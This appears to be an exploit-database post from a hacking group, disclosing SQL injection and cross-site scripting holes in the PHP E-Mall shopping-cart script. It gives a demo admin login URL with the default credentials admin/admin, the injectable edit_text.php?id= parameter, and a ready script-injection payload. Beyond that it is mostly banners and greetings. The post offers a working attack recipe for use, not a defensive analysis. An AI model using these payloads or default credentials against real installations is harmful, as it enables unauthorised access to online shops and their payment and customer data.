Exploit for php platform in category web applications
============================================
PHP E-Mall SQL Injection & Xss Vulnerability
============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title:PHP E-Mall SQL Vulnerable & XSS Vulnerable
Vendor url:http://www.sellatsite.com
Version:2???
Price:150$
Published: 2010-06-21
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team
Shoutzz:- To all ICW members
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:
PHP E-Mall is a powerful e commerce shopping mall solution. With your E-Mall, you can setup in just a few hours and be ready to begin selling products in no time. Includes powerful admin CP and the ability to receive payments via PayPal and Authorize.net. Code: PHP 4.0
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Vulnerability:
*SQLi Vulnerability
DEMO URL :
Login Details:-
Username:admin
password:admin
http://preprojects.com/emall/admin/loginform.php
http://preprojects.com/emall/admin/edit_text.php?id=[sqli]
*XSS Vulnerability
Parameter: '"--><script>alert(0x000872)</script>
DEMO URL:
http://preprojects.com/emall/admin/edit_text.php?id=[xss]
# 0day n0 m0re #
# L0rd CrusAd3r #
# 0day.today [2018-01-10] #